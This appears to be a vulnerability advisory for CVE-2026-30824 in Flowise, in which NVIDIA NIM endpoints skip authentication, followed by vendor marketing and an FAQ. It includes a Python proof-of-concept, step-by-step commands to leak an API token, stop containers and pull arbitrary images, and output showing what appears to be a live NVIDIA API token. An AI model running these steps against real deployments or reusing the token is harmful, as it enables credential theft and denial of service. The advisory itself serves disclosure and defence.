Summary
Missing Authentication on NVIDIA NIM Endpoints
The NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
Vulnerability Details
| Field | Value |
|---|---|
| CWE | CWE-306: Missing Authentication for Critical Function |
| Affected File | packages/server/src/utils/constants.ts |
| Affected Line | Line 20 ('/api/v1/nvidia-nim' in WHITELIST_URLS) |
| CVSS 3.1 | 8.6 (High) |
Root Cause
In packages/server/src/utils/constants.ts, the NVIDIA NIM route is added to the authentication whitelist:
export const WHITELIST_URLS = [
// ... other URLs
'/api/v1/nvidia-nim', // Line 20 - bypasses JWT/API-key validation
// ...
]
This causes the global auth middleware to skip authentication checks for all endpoints under /api/v1/nvidia-nim/*. None of the controller actions in packages/server/src/controllers/nvidia-nim/index.ts perform their own authentication checks.
Affected Endpoints
| Method | Endpoint | Risk |
|---|---|---|
| GET | /api/v1/nvidia-nim/get-token |
Leaks valid NVIDIA API token |
| GET | /api/v1/nvidia-nim/preload |
Resource consumption |
| GET | /api/v1/nvidia-nim/download-installer |
Resource consumption |
| GET | /api/v1/nvidia-nim/list-running-containers |
Information disclosure |
| POST | /api/v1/nvidia-nim/pull-image |
Arbitrary image pull |
| POST | /api/v1/nvidia-nim/start-container |
Arbitrary container start |
| POST | /api/v1/nvidia-nim/stop-container |
Denial of Service |
| POST | /api/v1/nvidia-nim/get-image |
Information disclosure |
| POST | /api/v1/nvidia-nim/get-container |
Information disclosure |
1. NVIDIA API Token Leakage
The /get-token endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.
Token obtained:
{
"access_token": "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",
"token_type": "Bearer",
"expires_in": 3600
}
Token validation:
curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models
2. Container Runtime Manipulation
On systems with Docker/NIM installed, an unauthenticated attacker can:
- List running containers (reconnaissance)
- Stop containers (Denial of Service)
- Start containers with arbitrary images
- Pull arbitrary Docker images (resource consumption, potential malicious images)
Proof of Concept
poc.py
#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated
Usage:
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""
import argparse
import urllib.request
import urllib.error
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
ap.add_argument("--path", required=True, help="NIM endpoint path")
ap.add_argument("--method", default="GET", choices=["GET", "POST"])
ap.add_argument("--data", default="", help="Raw request body for POST")
args = ap.parse_args()
url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
body = args.data.encode("utf-8") if args.method == "POST" else None
req = urllib.request.Request(
url,
data=body,
method=args.method,
headers={"Content-Type": "application/json"} if body else {},
)
try:
with urllib.request.urlopen(req, timeout=10) as r:
print(r.read().decode("utf-8", errors="replace"))
except urllib.error.HTTPError as e:
print(e.read().decode("utf-8", errors="replace"))
if __name__ == "__main__":
main()
Exploitation Steps
# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
--method POST --data '{"containerId":"<target_id>"}'
# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
--method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'
Evidence
Token retrieval without authentication:
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}
Token grants access to NVIDIA API:
$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
{"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}
Container endpoints return 500 (not 401) proving auth bypass:
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}
References
Impact
A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-30824? CVE-2026-30824 is a high-severity missing authentication for critical function vulnerability in flowise (npm), affecting versions <= 3.0.12. It is fixed in 3.0.13. A critical operation is accessible without requiring any authentication.
- Which versions of flowise are affected by CVE-2026-30824? flowise (npm) versions <= 3.0.12 is affected.
- Is there a fix for CVE-2026-30824? Yes. CVE-2026-30824 is fixed in 3.0.13. Upgrade to this version or later.
- Is CVE-2026-30824 exploitable, and should I be worried? Whether CVE-2026-30824 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-30824 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-30824? Upgrade
flowiseto 3.0.13 or later.